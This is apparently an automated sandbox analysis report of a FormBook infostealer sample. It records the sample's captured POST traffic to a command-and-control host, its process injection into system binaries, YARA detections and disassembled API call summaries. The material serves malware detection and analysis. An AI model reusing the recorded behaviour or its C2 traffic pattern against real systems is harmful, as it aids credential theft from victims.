Jun 13, 2024 11:07:04.983449936 CEST	733	OUT	POST /wzcd/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.lunareafurniture.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.lunareafurniture.com Referer: http://www.lunareafurniture.com/wzcd/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 49 53 62 4d 36 77 43 79 79 52 70 36 4c 30 79 55 2f 79 6d 52 4d 66 35 33 6c 7a 51 6e 46 52 32 44 78 7a 4c 41 72 4e 69 6f 33 42 68 64 58 71 68 62 75 57 4a 43 4f 33 42 2b 46 72 68 63 37 50 74 4d 48 78 50 63 30 65 56 79 55 6b 44 36 44 57 6d 66 4a 4d 54 77 38 45 50 7a 71 72 65 6a 59 6f 46 4a 30 48 37 49 36 59 49 75 72 2f 34 74 48 76 4f 59 66 68 35 66 34 61 4b 4c 5a 38 4a 70 6a 75 68 74 70 52 4a 57 67 68 6b 77 78 75 66 75 6f 37 4b 41 2f 39 69 65 32 49 4d 52 54 77 43 52 67 46 44 6c 6a 69 66 35 67 48 4f 53 6f 4f 55 4f 75 36 66 41 75 73 73 4f 55 64 79 4f 78 73 51 56 31 30 66 49 52 53 6f 51 6d 57 67 3d Data Ascii: fD=ISbM6wCyyRp6L0yU/ymRMf53lzQnFR2DxzLArNio3BhdXqhbuWJCO3B+Frhc7PtMHxPc0eVyUkD6DWmfJMTw8EPzqrejYoFJ0H7I6YIur/4tHvOYfh5f4aKLZ8JpjuhtpRJWghkwxufuo7KA/9ie2IMRTwCRgFDljif5gHOSoOUOu6fAussOUdyOxsQV10fIRSoQmWg=
Jun 13, 2024 11:07:05.583487988 CEST	864	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 13 Jun 2024 09:07:05 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 13 Jun 2024 10:07:05 GMT Location: https://www.lunareafurniture.com/wzcd/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NAkqkm3fqSK02ijeCbPSF7m1Ur6FSvzN5VO63d9GsdfZ3CwMHEL2h9MzcDAqFQLP%2Fz2NZ6200WEdsFEwI5pbOdY6zHQnueVlBi%2BnX7m7bB6KCg3l7JGrTmWUGde2dQN9rj5hyo%2Ba66%2FEYxk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 8930eda7786e6b33-DFW alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	05:02:58
Start date:	13/06/2024
Path:	C:\Users\user\Desktop\pismo1A 12.06.2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pismo1A 12.06.2024.exe"
Imagebase:	0x6a0000
File size:	1'257'472 bytes
MD5 hash:	1DC0EF58FCD118EDA3E4E6DB7F790655
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:02:59
Start date:	13/06/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pismo1A 12.06.2024.exe"
Imagebase:	0x2c0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:03:19
Start date:	13/06/2024
Path:	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe"
Imagebase:	0x80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:03:20
Start date:	13/06/2024
Path:	C:\Windows\SysWOW64\write.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\write.exe"
Imagebase:	0xae0000
File size:	10'240 bytes
MD5 hash:	3D6FDBA2878656FA9ECB81F6ECE45703
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	05:03:33
Start date:	13/06/2024
Path:	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe"
Imagebase:	0x80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:03:44
Start date:	13/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 006A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006A430D

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

GetCurrentProcess.KERNEL32(?,0073CB64,00000000,?,?), ref: 006A4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 006A4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006A4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006A4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006A4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 006A447B
GetSystemInfo.KERNEL32(?,?,?), ref: 006A44A0

Strings

|O, xrefs: 006E36F8
kernel32.dll, xrefs: 006A444F
GetNativeSystemInfo, xrefs: 006A4460

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
Instruction ID: 0286a7249e77780ef1528ec5e45c527fe1781fa23d07fc625699ffe720b7dd7f
Opcode Fuzzy Hash: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
Instruction Fuzzy Hash: 82A1E37190A3D0CFCB12DB7D7C441D57FE6AB67380B84C499E08D93B62D6684985CB2D

Function 006A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42C9
LoadResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35BE
SizeofResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35D3
LockResource.KERNEL32(006A50AA,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20,?), ref: 006E35E6

Strings

SCRIPT, xrefs: 006A42BF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
Instruction ID: 8a6020bec496b86d6276c9284a85906cf6092536865a589822c79bfc43482068
Opcode Fuzzy Hash: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
Instruction Fuzzy Hash: 56115E71240701BFE7229B65DC49F677BBAEFC6B52F148169F502E6250DBB1DD008B60

Function 006E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B

Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00762224), ref: 006E2C10
ShellExecuteW.SHELL32(00000000,?,?,00762224), ref: 006E2C17

Strings

runas, xrefs: 006E2C0B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 68846099b39094c37d087be4860276949a37e0962ffe68cb98b4903dad31b98c
Instruction ID: 8128e3a2118f40e1595c51636fda5d95f53dac3c18227f5e1d762b1f13f3df31
Opcode Fuzzy Hash: 68846099b39094c37d087be4860276949a37e0962ffe68cb98b4903dad31b98c
Instruction Fuzzy Hash: ED110A311083925BCB84FF24D8619BE77A79F93344F44542CF047121A3CF289D4A8F2A

Function 0070DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,006E5222), ref: 0070DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0070DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0070DBEE
FindClose.KERNEL32(00000000), ref: 0070DBFA

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
Instruction ID: e5d79f1d81dfda30635c50e78e9cd2be234cd7f60476515577dfb50af226df8b
Opcode Fuzzy Hash: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
Instruction Fuzzy Hash: 41F0A7314106249BF2316BB89C0D46B3BACAE01335F108702F835D10E0EBB85D5486AA

Function 006AD730 Relevance: 21.6, APIs: 14, Instructions: 629windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 006AD807
timeGetTime.WINMM ref: 006ADA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB28
TranslateMessage.USER32(?), ref: 006ADB7B
DispatchMessageW.USER32(?), ref: 006ADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB9F
Sleep.KERNEL32(0000000A), ref: 006ADBB1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 088fd1200154b6b231a0856ed87e28c991570a03f537d95b0b594d34d154ae4b
Instruction ID: 2a45d2118c6711c87c55a15b3a1b8d0a641850b4ca1e8b7692805f09523def40
Opcode Fuzzy Hash: 088fd1200154b6b231a0856ed87e28c991570a03f537d95b0b594d34d154ae4b
Instruction Fuzzy Hash: F3420070208206DFE728EB24C854BBAB7E2BF46304F14851DE5668B7A1C774EC85CF92

Function 006A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006A2D07
RegisterClassExW.USER32(00000030), ref: 006A2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
LoadIconW.USER32(000000A9), ref: 006A2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94

Strings

TaskbarCreated, xrefs: 006A2D37
0, xrefs: 006A2CE9
AutoIt v3 GUI, xrefs: 006A2D23
+, xrefs: 006A2CF0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
Instruction ID: 3adfbd928a02a58ac3d66baf190147555b57b50fe3e811ac828073168a4e7dc6
Opcode Fuzzy Hash: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
Instruction Fuzzy Hash: 2221FCB5911348AFEB01DF98EC49BDDBBB4FB08741F00811AF615B6290D7B95540CF98

Function 006D8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.l, xrefs: 006D903A, 006D8FD0, 006D8FF2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: .l
API String ID: 0-3986846653
Opcode ID: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
Instruction ID: 80de434d18419b0b9bcf76c353f935900dc36dbb56afd15ded32821f958e2ad2
Opcode Fuzzy Hash: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
Instruction Fuzzy Hash: 86C1D274E04349AFDB21EFA8D845BEDBBB2AF09310F14409EE519A7392C7349A41CB75

Function 006E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E039A: CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7

GetLastError.KERNEL32 ref: 006E076F
__dosmaperr.LIBCMT ref: 006E0776
GetFileType.KERNELBASE(00000000), ref: 006E0782
GetLastError.KERNEL32 ref: 006E078C
__dosmaperr.LIBCMT ref: 006E0795
CloseHandle.KERNEL32(00000000), ref: 006E07B5
CloseHandle.KERNEL32(?), ref: 006E08FF
GetLastError.KERNEL32 ref: 006E0931
__dosmaperr.LIBCMT ref: 006E0938

Strings

H, xrefs: 006E08BD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
Instruction ID: cff1588d4b9a200b82300903f62f55f56ea9022393b02b96f0c34831e7fe342b
Opcode Fuzzy Hash: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
Instruction Fuzzy Hash: 03A13632A002848FEF19AF68D851BAE3BA2EB06320F14415DF815AB3D1D7759D93CB95

Function 006A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78

Part of subcall function 006A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006A3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006A356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006E318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006E31CE
RegCloseKey.ADVAPI32(?), ref: 006E3210
_wcslen.LIBCMT ref: 006E3277
_wcslen.LIBCMT ref: 006E3286

Strings

Include, xrefs: 006E3184, 006E31C5
\Include\, xrefs: 006A3527
Software\AutoIt v3\AutoIt, xrefs: 006A3560
\, xrefs: 006E328C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 9ed9df31c5ba8bd65261672c92fa282c3db0b2a7ccc70e3593ef015e664d4b5b
Instruction ID: 9901249b3358700decabd5d596b975ad354bac3ccb152ad9009dc86dfd31dfad
Opcode Fuzzy Hash: 9ed9df31c5ba8bd65261672c92fa282c3db0b2a7ccc70e3593ef015e664d4b5b
Instruction Fuzzy Hash: 6F71D6714053109EC344EF25DC419ABB7F9FF85380F40842EF199972A2DB389A89CF69

Function 006A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006A2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 006A2B9D
LoadIconW.USER32(00000063), ref: 006A2BB3
LoadIconW.USER32(000000A4), ref: 006A2BC5
LoadIconW.USER32(000000A2), ref: 006A2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006A2BEF
RegisterClassExW.USER32(?), ref: 006A2C40

Part of subcall function 006A2CD4: GetSysColorBrush.USER32(0000000F), ref: 006A2D07
Part of subcall function 006A2CD4: RegisterClassExW.USER32(00000030), ref: 006A2D31
Part of subcall function 006A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
Part of subcall function 006A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
Part of subcall function 006A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
Part of subcall function 006A2CD4: LoadIconW.USER32(000000A9), ref: 006A2D85
Part of subcall function 006A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94

Strings

AutoIt v3, xrefs: 006A2C2F
0, xrefs: 006A2C0F
#, xrefs: 006A2C16

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
